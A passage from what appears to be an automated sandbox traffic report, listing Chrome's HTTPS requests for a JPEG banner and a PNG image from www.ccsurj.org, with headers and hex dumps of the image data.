                                          Data Ascii: e%E!l'}a<Z-^?:%B)K1vW:CK>ssWZ<X(|1+A>_\.?S.B_o~cW//|Efc,Zp((eZwTPL?kY1|(N)>s~So|0)%jr~`5:6Kx0LA
                                          2025-01-12 00:17:04 UTC16384INData Raw: 26 a5 ac d5 6a cf 3c f3 cc 77 bf fb 5d df f3 0a b9 3c 23 14 24 2f 14 0a 8c b1 db 6e bb ed 85 3f bd b4 7b f7 1e d7 29 6c de 3c fc e0 6f 7f c7 68 ce 62 85 93 4f 7e c7 3f 7c e8 23 61 40 c6 c7 66 6c a7 f0 ee bf 7d f7 ab af bf 42 99 f0 83 fa c4 cc 5e e6 ca ef 7e ef 9b 27 9c 78 0c 17 0d 66 81 94 bc 5c 2e 12 8b 02 03 21 9a 9e 48 f5 ba c7 b9 ac d7 bd ab af be a6 b7 b7 1f 80 4a 01 d3 53 55 d7 2d 58 2c c7 39 08 2e ab 95 46 57 57 4f 2e 57 58 30 b8 a8 a7 77 c0 0f e4 8a 95 07 9f 79 e6 07 57 1e b8 fa 93 9f fc ec f5 37 7c be 54 ee b7 ed a2 1f 80 04 92 2f 16 42 11 1c b4 fa 40 0e 41 2e 97 eb e8 e8 08 82 c0 76 ac d7 36 be fa ad 7f ff e6 f0 b6 37 28 05 cf ab 07 81 e7 ba 76 18 fa a8 76 a0 1d 91 10 02 80 f2 50 6e d9 b2 65 c1 c0 90 e3 e4 00 a8 10 02 93 2b f8 be 8f c7 cf 8c d9
                                          Data Ascii: &j<w]<#$/n?{)l<ohbO~?|#a@fl}B^~'xf\.!HJSU-X,9.FWWO.WX0wyW7|T/B@A.v67(vvPne+
                                          2025-01-12 00:17:04 UTC16384INData Raw: 58 19 05 13 f9 05 0c 49 d1 12 7a e6 6c b5 8f 85 49 c5 46 8a e4 43 c7 00 9a 9e 9e 96 52 2a 15 23 e3 c0 14 22 48 86 02 11 00 29 42 18 03 33 ec 41 97 09 6b ea 3f 0b 5b ec 2a fa 25 03 50 64 16 e8 a4 1a 26 25 ad 37 69 22 64 8a 32 92 97 5d 51 af 78 cf 2b 4f 16 92 99 22 d1 ac 30 2f 4a 99 25 b3 26 19 9a 0c e7 b6 42 8e 54 f1 1f 91 7d b0 40 68 39 f4 01 8b ce 46 fd 05 2e 84 7a 95 4c ad 64 55 48 b7 9e 09 f6 88 5d db b3 8a 05 dc 9a 65 bd be d2 77 38 99 11 f4 15 32 48 61 be 54 da a3 21 a9 c5 81 56 2f 4c 31 96 bd 77 0e 40 7b ba 4e d6 fb bc 6c 67 90 35 3d 7b 51 d2 14 8f 39 15 2c 4e 80 f9 d8 32 4d 93 fc fa e9 5f 7d df 0f 82 a0 af af 0f 93 fb 0e e9 4d 84 cc 8e 58 2f 69 61 8c 88 27 9c 70 c2 83 0f 3e 48 96 92 10 82 ae 89 85 61 e8 07 be 52 2a 8e 62 29 e5 d5 57 5d 75 d9 65 97
                                          Data Ascii: XIzlIFCR*#"H)B3Ak?[*%Pd&%7i"d2]Qx+O"0/J%&BT}@h9F.zLdUH]ew82HaT!V/L1w@{Nlg5={Q9,N2M_}MX/ia'p>HaR*b)W]ue


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          56192.168.2.449807154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC377OUTGET /images/21/11/25/1p6vg4xelj/banner-2.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:04 UTC304INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 333374
                                          Last-Modified: Fri, 10 Jan 2025 07:04:24 GMT
                                          Connection: close
                                          ETag: "6780c678-5163e"
                                          Expires: Tue, 11 Feb 2025 00:17:03 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:04 UTC16080INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 78 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 01 05 01 01 01 01 01 00 00 00 00 00 00 00 00 07 03 04 05 06 08 02 09 01 00 0a ff c4 00 56 10 00 01 04 01 02 04 04 04 03 06 02 07 04 06 04 0f 02 01 03 04 05 06 11 12 00 07 13 21 14 22 31 41 15 23 32 51 08 61 71 16 24
                                          Data Ascii: JFIFHHCCxV!"1A#2Qaq$
                                          2025-01-12 00:17:04 UTC16384INData Raw: 44 fd 97 5b 35 ed e8 9f 7e 12 e9 2c ba d9 ed ed c2 5d 7a c9 5d ba a6 ba 7e 9c 35 79 74 d0 f6 d7 4f 4e da 70 8e 29 2c 9f 82 2a a0 ff 00 75 e2 12 a4 09 c0 86 ed 4b ed e9 c3 2e a4 0c ba 70 0d a8 f9 be fe 9c 34 95 2b 1b 65 d2 26 aa aa bd bb f0 89 d6 4e 9a 4f 4e de fd f8 8d c9 ed 4e 51 14 97 df b7 bf 0c 29 e0 27 8d f9 47 d3 cc be 9c 44 52 a5 74 54 fb ea 5a 6a bc 35 3a cb b1 fa bb f7 41 4d 07 84 4f 09 76 d3 4d 55 7d 57 86 12 9e c1 c4 a7 02 2b d8 51 15 75 f5 e1 b7 53 5b 44 e0 5b dd dd 7b 20 f1 1d d4 8d 6a 59 05 57 44 1e c9 ee bf 6e 11 39 2c 23 ae bd ff 00 4e 18 54 a0 68 97 11 d3 55 fb fa 70 c2 95 2e 29 db 4e 18 4a 78 4a e9 af 0c 4f 4e 40 7f cf 86 12 a4 09 d2 27 b2 76 4e 23 53 80 9d 34 89 dd 74 ee 9e fc 46 e4 a3 75 20 82 a8 88 1a ee f7 5e 21 bf 15 2a fa 28 a9 a2
                                          Data Ascii: D[5~,]z]~5ytONp),*uK.p4+e&NONNQ)'GDRtTZj5:AMOvMU}W+QuS[D[{ jYWDn9,#NThUp.)NJxJON@'vN#S4tFu ^!*(
                                          2025-01-12 00:17:04 UTC16384INData Raw: db ed 47 34 43 5f 91 25 c1 79 bd 3a 8d 1b 65 f6 4e 36 b8 8d 1b a6 8c 48 06 a4 2e 6f 43 55 d4 ca 58 78 1f 25 fb 91 7c f7 bf fc 29 65 50 f0 0c da 64 eb be 4c df 4a 08 d8 e5 db c6 ae bd 5c e9 e8 2c c3 92 ea f6 ea 20 f6 61 ed 76 be 08 8d 9a a3 82 25 c6 31 f1 98 0d c6 dc 47 d4 2d dd 3c c2 a5 b6 3e d7 3e 7d cb 6a 73 a3 93 d5 39 85 3c 3e 68 72 ca 4c 67 77 b6 b3 59 93 0b bb 2a d9 77 23 41 4e fd 22 5e ce b7 ea 05 df 44 d1 51 1d 2c 62 56 a7 b2 43 11 b1 59 76 b2 ed 6c 91 c8 f2 9a 28 17 b5 65 d3 99 10 f4 55 07 34 fc d1 50 84 93 f2 d0 91 74 5f 74 e0 63 c7 3d d1 46 10 e4 41 e5 1f 35 6c f9 27 3a 64 79 6d 94 fe 54 4e 90 d2 ce ab 02 f9 98 ec 99 6e 8b 69 22 36 f2 5d 61 12 af 9c 75 d5 b5 d0 7b ea 0a 6e a4 98 c5 ff 00 1f 97 f0 99 55 07 59 ff 00 2f 9f f2 8e 1c ee e4 d4 49 71
                                          Data Ascii: G4C_%y:eN6H.oCUXx%|)ePdLJ\, av%1G-<>>}js9<>hrLgwY*w#AN"^DQ,bVCYvl(eU4Pt_tc=FA5l':dymTNni"6]au{nUY/Iq
                                          2025-01-12 00:17:04 UTC16384INData Raw: e7 96 dc 0d fd e1 54 39 ab cd 0b 0e 64 64 b5 eb 41 1a ca 86 a6 14 25 66 05 7c b2 f1 92 1f 47 5f 3f 98 f0 0e d4 d7 72 6d 1d 9a 9f dc 97 b2 70 03 16 af 8a b0 87 86 e8 de fd 79 ef f7 42 ab 2a 2e d0 d6 1d 77 27 f8 5f 71 2b be 6c a6 41 51 57 1c 71 d3 1b 57 c2 34 39 92 e2 ad 7b 2c 1b 68 44 8e 3a eb c0 9e 41 44 5d db 4f 77 b8 f9 97 b8 ac 23 06 8b 12 ab 8e 2a 6b b2 62 ee c9 cd b1 e6 08 d8 f2 d3 b9 04 aa c4 5d 49 4e f9 26 17 60 1a f2 b2 f4 8a 90 a7 78 18 ad 5a cf 83 71 38 98 44 97 61 10 3a 6c ba 45 a8 ea 23 bc fb 7e 6a ba af aa f1 f6 46 13 49 53 4d 46 c8 ea 25 eb 64 68 d5 d6 cb 7f 25 f3 c5 74 f0 cf 50 e7 43 1e 46 1d 9b 7b d9 42 55 79 eb 6a 17 45 d3 c2 46 15 f7 d3 46 91 17 fe 5c 68 1d b9 f3 42 59 b0 f2 4f 0d bd 34 d1 7e e9 b7 d3 d1 78 f0 29 ae 62 af 65 51 9a 96 dd
                                          Data Ascii: T9ddA%f|G_?rmpyB*.w'_q+lAQWqW49{,hD:AD]Ow#*kb]IN&`xZq8Da:lE#~jFISMF%dh%tPCF{BUyjEFF\hBYO4~x)beQ
                                          2025-01-12 00:17:04 UTC16384INData Raw: 48 0c 4e c0 5e 81 2b c3 df cc 72 71 b7 f1 26 56 7a 79 62 99 8a 02 2f 4f 6e e1 40 11 52 15 43 24 55 d3 82 73 e2 35 13 db 30 b6 e3 b8 db 8f 9a a9 8b c9 20 d3 37 77 76 89 c7 2a a9 e1 e4 f1 9c a7 b1 86 c4 81 eb fe e0 f2 a6 d3 67 7a e8 48 d9 89 06 ba 2a ef d3 5d 3d 7f 4e 00 e2 73 18 dc 1d 7f 1e f4 09 80 3b da 43 fb 3a bc 8b 29 c6 b3 f8 34 d4 48 6b 55 7f ae 1f 15 a7 17 59 ad d6 3f b0 5e 7d c7 08 d3 ce 9d 4f 40 4d 50 89 04 57 54 e3 5f 46 22 a4 92 22 5d bb 7b 5c 75 23 90 fb f0 47 ea 68 7f 0f 4a 5a cd dc 01 f9 1d d2 42 d4 e2 8f 8f d8 46 2b a6 6f ea d0 7c 5c 47 84 94 8d b1 ea 01 bc db cb e5 25 da a0 8a 05 a2 ae 8b ea 8b c5 49 40 25 da 8b 14 1e 7a 57 93 65 a8 79 57 96 45 c4 6b ad a7 3d 61 1e 9c 5e 79 bb 49 51 25 57 04 d2 9c db 4d 6d 18 54 53 37 22 c4 7d f3 11 27 01
                                          Data Ascii: HN^+rq&Vzyb/On@RC$Us50 7wv*gzH*]=Ns;C:)4HkUY?^}O@MPWT_F""]{\u#GhJZBF+o|\G%I@%zWeyWEk=a^yIQ%WMmTS7"}'
                                          2025-01-12 00:17:04 UTC16384INData Raw: b8 db 35 ae b4 dd ef 2c 5f 9f 8c bd 98 43 b9 a6 8d 8f 33 21 b8 60 dc 49 41 30 de 71 c5 5d 35 16 8c 81 8e 98 f7 54 71 50 b4 fe 5e 33 f2 d5 b5 9a 38 1b fa f2 43 6b 68 a7 94 99 49 fe 55 33 03 a7 a6 97 98 d1 47 c8 08 8f 1b 8f 61 1c 2c 2c 97 4e a3 a4 6e 08 ab 22 f2 a6 d6 b5 0d 7c c9 a2 8f 6d 15 17 4e 25 96 56 b7 5e 1c 55 1a 48 47 58 ad bc cd c7 79 89 9b 66 92 31 1c 7e 5b cd 64 4c c9 98 20 d1 be e3 4e a4 36 04 9c 75 42 63 fb 08 dd 92 2d 09 6f 2d 10 b4 14 d5 35 ed 5b 0a 96 28 e5 79 78 b0 d4 f9 f3 f0 e4 b7 b8 6d 65 34 52 0e b0 5c 21 9f 2e f3 ce 73 e1 d7 56 18 cd 3e 4b 98 e0 f5 4d 59 c7 67 27 85 30 c0 bc 2c 78 ab ba 40 0b 33 1b 78 82 51 89 2a 36 6d 26 e2 25 4d 35 1e 34 ff 00 89 64 22 e4 dc 1e 5c 79 11 e0 b5 f8 95 0e 1f 3c 61 ed 1d ab 69 6f af 72 97 ba a8 e6 08 66
                                          Data Ascii: 5,_C3!`IA0q]5TqP^38CkhIU3Ga,,Nn"|mN%V^UHGXyf1~[dL N6uBc-o-5[(yxme4R\!.sV>KMYg'0,x@3xQ*6m&%M54d"\y<aiorf
                                          2025-01-12 00:17:04 UTC16384INData Raw: 16 8a 34 49 33 1e 83 e2 1d 0f 13 ab ee 0b 62 d2 38 20 be 61 25 45 25 d5 11 35 86 46 c3 0b 88 d6 cd 76 bc c0 bd b6 d0 5e f6 ef 54 ea 2a 98 d3 ec da c4 ef e2 ac 92 31 da 5c 6e 87 04 cf e8 ef a1 37 06 e2 3b 81 90 3d 1e d5 a9 71 ae 9b 94 c2 22 24 7d 8a 24 e3 b1 ba 66 29 f2 51 3d 94 bf 97 87 55 40 7a b2 d2 de d5 f4 e0 5b e4 75 1d eb 3b 49 52 67 9c b0 f0 f9 85 9f f9 8c f5 3f 2e e3 58 bb 6d 45 4a f2 73 0a fc a2 61 2f 41 79 a5 9a 8c bc c4 79 ee 21 20 75 c5 b0 6c a5 1b 28 60 df d4 a4 9d d5 35 e0 d3 30 ba 99 1a c7 67 d1 ad d7 88 27 e0 4e 96 bf 0d 11 09 df 19 20 0f 68 f3 e7 a8 fa 7b 90 17 18 c9 43 97 99 8b 76 79 bc ab 99 b8 ab d5 4e 41 84 b3 5f 71 cf 85 82 9a 10 8b 1d 55 51 da de aa 22 3a a6 e1 25 ee 8b db 8b f5 30 7e 36 1c 90 80 1f 7b e9 fa 8f f2 b6 d0 e1 02 2a 0b
                                          Data Ascii: 4I3b8 a%E%5Fv^T*1\n7;=q"$}$f)Q=U@z[u;IRg?.XmEJsa/Ayy! ul(`50g'N h{CvyNA_qUQ":%0~6{*
                                          2025-01-12 00:17:04 UTC16384INData Raw: c9 10 f2 22 64 11 52 be 46 aa 9a 69 e3 a2 0f 87 35 ef db 73 25 df d7 87 b6 a9 ed d0 a6 3a 95 ae d4 14 40 95 9b f2 77 98 69 15 33 fc 09 d8 24 66 3a d9 74 56 5c 33 da 5b d3 ab 22 bb 5d e1 b9 10 b6 c8 67 66 ba 2a a7 6e 0a 52 63 52 43 ec bc 84 36 a3 0a 64 9e d3 41 4d 66 72 6e 83 24 62 b2 e7 05 ce 23 e5 d0 eb a4 b4 f4 7a a9 af b7 22 33 2c 47 15 12 65 3c 18 ec de 4d a9 26 af b6 ab e9 dd 38 d2 d3 74 b1 c1 96 7b 41 ef 1b fa f7 20 13 f4 71 a5 d9 9a e3 e0 76 f5 ef 42 4e 60 72 7f 22 bc 9a 51 73 bc 64 2a f1 68 e4 db 6c 5d c2 46 ec 66 ba 40 6a 2b d1 98 00 69 5e 2e f5 76 fd 2a 66 89 a7 91 74 e0 e4 38 dd 25 47 ea b1 ef d3 fc fb d0 89 30 aa 98 35 b6 9d da ed f2 59 d2 87 94 b4 38 2c 6c 62 35 4c cb 99 73 2a de ac 99 55 19 e5 19 71 2b 65 d6 59 3e 5e 32 c8 1b 46 de 60 55 d7
                                          Data Ascii: "dRFi5s%:@wi3$f:tV\3["]gf*nRcRC6dAMfrn$b#z"3,Ge<M&8t{A qvBN`r"Qsd*hl]Ff@j+i^.v*ft8%G05Y8,lb5Ls*Uq+eY>^2F`U
                                          2025-01-12 00:17:04 UTC16384INData Raw: 8a e2 64 72 e1 b7 5e ed 54 1b aa d9 83 6e c7 89 9d 20 cd b1 29 20 bf 30 fa ce 90 1a 92 35 ea a4 8d 88 a6 89 ae 91 a3 30 6c 7e c8 f3 1e f5 b8 c2 2a df f8 39 64 94 f6 89 d8 f6 4d 80 b6 df 2d fc 49 42 7c 46 24 ca 4a 8c 6e 97 14 93 a5 9d d9 9b d3 66 96 f2 6d d6 00 fc 13 f1 87 54 42 da f6 e5 12 d1 13 46 44 d5 74 55 ef 6a d6 6e e8 04 a5 cf 94 91 b7 af 5e 2a d1 02 8b 12 55 72 b7 13 7e 92 ba f6 ba ac 20 d9 28 ca 95 3e 54 a6 03 53 7a 4c 87 5c 12 55 16 fc 50 34 aa a9 a8 22 08 2a a9 37 aa e7 f1 07 cc e3 72 3b 3d c8 c7 57 23 18 35 36 3c fe 43 89 47 9e 52 b8 c5 47 34 29 4e 2d bc 2a 6a 88 a0 e5 75 ac 82 f9 6d bb 19 63 b8 e1 ee 42 24 44 1d c2 8e ee 25 f2 fa a2 2a f6 e0 10 a5 fc 5b 7a 97 7e ae 3c 8f 05 5a ba 9d e6 02 e2 2e 7e bb 20 5e 7d 90 62 19 4f 31 6f 33 cc 65 99 47
                                          Data Ascii: dr^Tn ) 050l~*9dM-IB|F$JnfmTBFDtUjn^*Ur~ (>TSzL\UP4"*7r;=W#56<CGRG4)N-*jumcB$D%*[z~<Z.~ ^}bO1o3eG
                                          2025-01-12 00:17:04 UTC16384INData Raw: 42 18 eb 66 d7 4f 5e f4 4d c1 a7 cf 1c fa 1f 2e 9c a5 bf b8 e5 f5 86 0d 22 8c 61 57 b2 ec 95 69 ab 67 c6 6c 52 d5 15 10 4a 34 94 3f 39 92 77 4d db b7 2a 70 fa 27 cb 59 06 61 ab b3 7c b7 d3 bf 43 65 9a 9f 0e 99 ee cc 07 62 db fa ee 54 3c 17 0f cd 72 6e 61 60 95 96 03 61 39 f8 56 f3 6a 33 89 52 95 5a 6c 2a 6b 7c 37 8b 66 51 b5 b1 b2 8c 4d 81 ec ee 9f 33 bf d4 a8 bc 1b e8 e5 33 aa 2b bf 0a d3 94 3a d7 00 fe 9e d1 77 ba da a1 58 cc 2c a0 a0 7c 93 0b 91 7b 73 bf e9 b2 ab fe 22 6c e0 65 d9 55 54 fc 64 59 93 41 57 18 2a 21 3c 05 d5 1d 90 5e 7a 14 72 7b ba ec 27 06 3e a2 8b ea 3a 2f e7 c5 03 17 e1 6a a7 61 20 80 eb 02 3f 50 1c 42 12 d7 0a 88 62 78 07 56 fb 95 a2 2e 1b 26 7e 1b 8e 7c 1b 25 81 99 83 4c c9 58 d4 55 88 24 dc 28 ea 23 2d ee 83 8a a0 b2 5c ea b8 e0 b8
                                          Data Ascii: BfO^M."aWiglRJ4?9wM*p'Ya|CebT<rna`a9Vj3RZl*k|7fQM33+:wX,|{s"leUTdYAW*!<^zr{'>:/ja ?PBbxV.&~|%LXU$(#-\


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          57192.168.2.449806154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC636OUTGET /__local/0/D8/B4/2A6083AF30532CABE26DE75AE3C_48A88581_1249E8.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:04 UTC305INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: image/png
                                          Content-Length: 1198568
                                          Last-Modified: Fri, 10 Jan 2025 07:04:28 GMT
                                          Connection: close
                                          ETag: "6780c67c-1249e8"
                                          Expires: Tue, 11 Feb 2025 00:17:03 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:04 UTC16079INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 f5 00 00 02 ca 08 02 00 00 00 d5 b9 f3 e1 00 00 00 09 70 48 59 73 00 00 21 d5 00 00 21 d5 01 04 9c b4 9d 00 00 20 00 49 44 41 54 78 9c 8c bc 77 8f 24 c9 95 27 f8 9e 09 97 a1 45 ea ac 2c d1 55 dd 14 c3 e1 0c c8 39 2e 16 38 cc 7d ed c3 2d b0 8b 5d 1c 86 c7 9b 9d 59 8a ee 26 bb 4b 66 56 8a d0 c2 b5 89 77 7f bc 88 a8 ac 22 07 38 af 86 b7 a7 bb 87 bb b9 c9 f7 13 66 f8 bb 7f f9 ef 44 64 ad f5 de 2b 81 61 18 22 a2 73 0e c9 21 22 78 22 22 44 12 42 10 91 03 67 81 3c 7a 22 24 22 f4 44 44 e0 81 88 02 a9 00 00 49 1c f6 44 44 e8 55 a0 49 10 3c da 10 11 00 9c 73 f0 b7 36 42 be 19 f9 09 87 f3 ce 12 ff 56 08 21 84 40 44 21 14 70 fa c0 11 6f 1e bd f7 fc 43 44 f9 e8 75 82 5f 0a e0 b5 da 25 6d 7f 71 77 b5 a9 2d 00 20
                                          Data Ascii: PNGIHDRpHYs!! IDATxw$'E,U9.8}-]Y&KfVw"8fDd+a"s!"x""DBg<z"$"DDIDDUI<s6BV!@D!poCDu_%mqw-
                                          2025-01-12 00:17:04 UTC16384INData Raw: 4c 42 08 2f 5f 7f 91 8e c7 03 ea cf 3f fd 75 bb b9 12 cd 57 bb 9b bf fc f9 bf f6 dd a8 56 7e f5 ab 2f ef 1f 3e 4b b1 7e 88 2f 5e dc 1c 0f f7 47 a3 10 e9 ea 6a 7b d8 df 11 85 ed a6 23 0a 87 fd 5d 8c fd f5 d5 78 7b 73 75 3c ee f7 fb f4 f2 c5 55 f7 e5 eb 52 52 29 3a 0c a1 eb 86 69 3a 00 90 bf c1 10 88 28 e4 3c c7 d8 33 e3 30 6c 98 f1 f3 e7 7b 33 89 b1 07 d0 e3 71 7e f1 e2 6a bb bd ba bf ff 3c 0c 9b cd a6 db ed ae 01 54 c4 fe ee ef 7e 4b 14 a6 e9 e0 e3 01 91 0f 87 47 33 03 d4 c0 1d 07 44 e0 5f eb 37 2a 00 a8 25 eb 76 37 a6 b9 0c 63 f7 f9 d3 fd ee 6a 33 4f d9 73 c6 98 39 c6 1e d1 72 96 52 12 d1 eb df fd ee 37 66 98 f3 bc dd 5e a5 34 dd de be f4 be bd bb fb d4 f7 63 29 69 b3 d9 bd 7e fd e2 cd 9b b7 39 cf cc f1 fa 7a c3 1c 73 9e 53 2a ff f6 df fe 8f 87 c3 84 68
                                          Data Ascii: LB/_?uWV~/>K~/^Gj{#]x{su<URR):i:(<30l{3q~j<T~KG3D_7*%v7cj3Os9rR7f^4c)i~9zsS*h
                                          2025-01-12 00:17:04 UTC16384INData Raw: 53 d5 9c 41 55 a7 d3 f1 3c a3 7c b5 13 29 62 e7 38 32 35 5e cd 4f 6f 4d 05 b9 40 ad 0c e8 be 63 5d fa f3 a2 f7 b4 c8 7a 47 6e 52 2b 72 0a 85 0a a1 a8 12 62 2d 43 8a 48 1e 64 40 a7 21 00 30 cf 4c a5 62 0a 4b 9c 7c fd 6a 5a 32 d6 20 1c b4 0b 00 58 ca d5 5f ee 5c 65 9e d6 9d bf fe 02 c0 e5 26 68 66 7d df 9f 8d a5 33 fa 86 53 72 5c 27 56 1d a1 e6 67 60 8c 0c d5 69 62 0b 13 18 aa 13 f5 59 33 11 cf fc 11 8b 1e 60 06 86 04 aa e6 d6 7b 60 ac 9f 7a e0 d7 95 14 93 45 e9 f7 ac 19 30 13 44 40 b0 92 f3 13 3f e3 a2 eb 0c 7d bf 8e d9 b6 28 ae 63 fd 80 b1 05 80 b1 22 79 1c b6 89 a6 02 86 60 e2 fe 05 b7 09 7e 68 37 b9 10 c5 eb 3e f4 23 fc b7 7f f8 27 ff db 34 4d 29 a5 22 f3 7e bf 7f ff fe fd 7e bf 8f b1 42 64 55 15 40 fb 61 df 08 be 97 9b d6 00 be 81 cd f3 9c 36 db be ef
                                          Data Ascii: SAU<|)b825^OoM@c]zGnR+rb-CHd@!0LbK|jZ2 X_\e&hf}3Sr\'Vg`ibY3`{`zE0D@?}(c"y`~h7>#'4M)"~~BdU@a6
                                          2025-01-12 00:17:04 UTC16384INData Raw: 39 1e 8f d6 66 cd b6 c4 1c 63 06 80 2a c6 29 2b 52 6b d2 f7 7d ea f2 34 4d c8 01 91 87 4d 88 49 a7 a6 a2 0f a5 34 03 ae 62 0d 6c 91 9b 7e 92 97 bb 7a f1 c5 76 bb 7d f5 e6 50 de 1c cc ac 94 76 2e 15 00 c6 f2 8e 63 64 b4 71 1c 73 0a a0 da a5 f0 d5 57 5f ed af 6e ae 6e 6e ba 94 ca 78 72 ff 16 a4 11 11 a5 bc ee 11 aa 5a 6b f5 02 45 37 58 2f 43 72 10 01 00 42 0e 33 c2 8b d0 14 59 14 39 73 2e ff cf 7f fe 7b 47 76 18 90 aa 35 53 c7 1e ff e8 8b 4f bb ed 4e 8e e7 f7 df fd d6 a7 41 6b 1a 23 af 39 96 18 b9 8b 1d e7 2e f6 db 14 98 b5 11 3c 86 02 d7 a9 ed 2b cc a5 87 80 e8 9b 6b 51 34 70 f6 63 e0 aa d6 aa 36 d5 e1 d5 f7 33 7e 07 08 5c 65 0e 18 c9 a6 3a a5 14 6c 9a 62 bf 29 7a c4 18 87 fd cd c3 b9 9c 8e 4f f8 6c dc e8 37 b3 69 1c 3d 27 c0 60 39 e7 61 e0 d4 0f bb fd 3e
                                          Data Ascii: 9fc*)+Rk}4MMI4bl~zv}Pv.cdqsW_nnnxrZkE7X/CrB3Y9s.{Gv5SONAk#9.<+kQ4pc63~\e:lb)zOl7i='`9a>
                                          2025-01-12 00:17:04 UTC16384INData Raw: 23 a9 29 00 9a 66 95 24 2a de c6 d2 20 81 29 82 39 e4 88 03 05 04 35 23 26 60 42 c4 ac e2 a1 17 df af c5 bc 42 35 f3 7e 61 e5 5c 13 80 5a 61 86 5b 68 d1 68 51 64 f6 24 b3 77 31 ff c5 6a 34 13 32 04 50 32 02 50 76 57 4b d4 4c 2c 8b 6a 66 40 66 24 0b 08 88 90 9a 2a ee 36 cd 38 74 ce ed c1 01 45 d2 f9 ed 33 7b 04 f3 5c 9f 4e c0 9e 0c 9c 1d 9e 13 d9 b2 ab ec 73 b9 c1 99 1d de c3 fd 0b b0 d6 23 f7 e3 38 22 e2 66 b3 71 f2 fa aa ae 4b 5a 52 55 93 a2 da 63 92 61 18 bc 7e c6 9c 67 62 3e 5c 7f d4 f0 83 b9 4c de 2f 2a 2f c6 73 b0 fa 7a 29 ca 25 e3 d0 77 2c 19 dd 35 66 e6 fc 11 3f 78 76 fe e0 b1 ba d8 eb e5 87 eb ef 8b f1 84 88 d3 34 8d 29 7b 4d ec 62 14 02 47 00 60 8e c8 84 c2 62 8a 82 f5 26 9a 85 50 45 52 76 4e 4b 31 b5 9c 93 4a 08 81 22 31 96 3e 3f 0c e0 8e c7 f1
                                          Data Ascii: #)f$* )95#&`BB5~a\Za[hhQd$w1j42P2PvWKL,jf@f$*68tE3{\Ns#8"fqKZRUca~gb>\L/*/sz)%w,5f?xv4){MbG`b&PERvNK1J"1>?
                                          2025-01-12 00:17:04 UTC16384INData Raw: d5 52 58 06 a8 61 81 ba 22 f6 f6 c3 0b a5 43 d8 ea 86 88 48 8d 2a 89 ec 75 25 42 f5 10 1a 1f 12 51 f0 c6 51 06 92 e5 6a a5 22 54 56 7a bf 63 2d f5 0e 3e b6 66 91 bd 5c 45 45 3b ec 4c 4b 8d 02 80 d7 c4 37 a6 22 f3 9c b6 13 1a 7a 7b 1f cb 2a 4e cb 2a 0a 46 56 24 49 d5 0e 35 27 d6 70 d4 2f 2c 61 4f db 92 a7 70 9b 71 e9 df b5 9b ee e2 dd 34 92 80 81 03 52 06 2f 34 6a 6d b7 5d 6c 2a 38 d1 cc 72 29 cb b2 58 4a 34 cc 6a e8 5b ad 75 7a ff b6 f7 75 b0 ae 37 31 c2 4a d5 d8 ba 9b dd ac 8b 56 6c 6b 62 26 95 d5 cf 94 a8 8e c4 4c 54 55 34 43 09 ed 2e e3 ed 25 23 00 e4 75 23 22 d3 02 00 8e 5d 8a 1c 22 07 55 73 b2 20 73 3e 63 67 46 13 db 4a f6 9e a1 7e 17 9c 7f 36 c6 ba e2 ea b5 50 00 20 27 45 44 26 02 92 da bb c1 49 c8 3c 83 5a 97 b2 79 3c ab f5 d9 46 dd 65 47 8d f6 80
                                          Data Ascii: RXa"CH*u%BQQj"TVzc->f\EE;LK7"z{*N*FV$I5'p/,aOpq4R/4jm]l*8r)XJ4j[uzu71JVlkb&LTU4C.%#u#"]"Us s>cgFJ~6P 'ED&I<Zy<FeG
